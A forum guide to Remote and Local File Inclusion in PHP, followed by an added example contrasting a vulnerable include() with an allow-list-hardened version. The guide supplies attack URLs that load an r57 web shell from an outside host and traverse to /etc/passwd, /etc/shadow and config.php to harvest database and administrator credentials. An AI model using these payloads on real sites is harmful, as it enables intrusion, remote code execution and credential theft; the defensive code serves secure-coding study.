This is a guide I wrote for my board: www.leethackers.org.
What is RFI?
RFI, also known as Remote File Inclusion, can be used to execute PHP code from a remote host. This can be really useful. For example:
www.target.com/index.php?page=index.txt
Here we see that the script takes the contents of the text file "index.txt" and places it into index.php.
This is done with the include() PHP function. Sadly, nobody thought about security when writing it: the value of the page parameter goes straight into include() without any validation. As I already said, it reads index.txt and places that code into index.php. What if we change index.txt to a file on a remote server, for example www.t00ls.org/r57.txt <--- This is a web shell. So basically, it should look like this now:
www.target.com/index.php?page=www.t00ls.org/r57.txt
If the target is vulnerable, you should see the web shell on the page without injecting anything or uploading a file! That easy.
What is LFI?
LFI, also known as Local File Inclusion, can be used to display sensitive information from a specified file on the web host. The concept is almost the same as RFI; the only difference is that the included files are on the local server. For example, we have this page:
www.target.com/index.php?page=contact.php
So it shows the contact.php form. Now let us try this:
www.target.com/index.php?page=../../../etc/passwd
If you get a page listing user accounts, then this page is vulnerable to LFI. The password fields are displayed as 'x' though, because the password hashes are kept in the 'shadow' file. Try to check that file. So do this:
www.target.com/index.php?page=../../../etc/shadow
This file is normally not readable by ordinary users. It is only readable by 'root'.
What you could also try is fetching the config.php file, which is usually located in the include folder. So:
www.target.com/index.php?page=./include/config.php
If you have got the DB details (server, username, password, database), you can connect to it and get the administrator password from the users table or whatever table holds them.
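To show the developer side of both sections above (the RFI and the LFI case), here is an added example that is not part of the original guide. It puts the unsafe include() pattern the guide describes next to a hardened version that maps the page parameter to a fixed allow-list and pins the resolved path under one directory with realpath(), and it checks that allow_url_include is off so remote includes are blocked at the interpreter level too. The page names, the demo directory and the file contents are constructed for the demonstration; nothing here comes from a real site.

```php
<?php
// Added example, not code from the original post. File names and demo
// directory below are constructed for illustration.

// VULNERABLE: whatever arrives in ?page= is handed straight to include().
// With allow_url_include=On this loads remote code (RFI); with ../ sequences
// it reads arbitrary local files (LFI).
function includePageUnsafe(string $page): void
{
    include($page);
}

// HARDENED: the request value is only a key into a fixed map of files.
const PAGE_MAP = [
    'index'   => 'index.txt',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request is not allowed.
function resolvePage(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, PAGE_MAP)) {
        return null;                                  // not on the allow-list
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_MAP[$page]);
    // Second line of defence: even a mis-edited PAGE_MAP entry must stay inside $baseDir.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function includePageSafe(string $page, string $baseDir): bool
{
    $path = resolvePage($page, $baseDir);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// Interpreter-level hygiene for the RFI case: remote includes should be disabled in php.ini.
function remoteIncludeDisabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// Demonstration against a temporary directory with two constructed page files.
$dir = sys_get_temp_dir() . '/rfi_lfi_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/index.txt', "<?php echo \"index page\\n\";\n");
file_put_contents($dir . '/contact.php', "<?php echo \"contact form\\n\";\n");

// The first two requests are the legitimate ones; the last two are the
// traversal and remote-URL shapes the guide describes, and both are rejected.
foreach (['index', 'contact', '../../../etc/passwd', 'http://example.invalid/r57.txt'] as $req) {
    $ok = resolvePage($req, $dir) !== null;
    printf("%-35s -> %s\n", $req, $ok ? 'allowed' : 'rejected');
}
includePageSafe('index', $dir);
echo 'allow_url_include is ', remoteIncludeDisabled() ? 'off' : 'ON (fix php.ini)', "\n";

// Clean up the demo files.
unlink($dir . '/index.txt');
unlink($dir . '/contact.php');
rmdir($dir);
```

The allow-list alone already stops both attacks, because the user never supplies a path, only a key; the realpath() check is there so that a later edit to the map (or a symlink dropped into the directory) cannot quietly reopen the hole. Turning allow_url_include off does not fix a vulnerable include() on its own, since local traversal still works, but it removes the remote-code half of the problem for every script on the server at once.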
Hope this small explanation helped you a bit!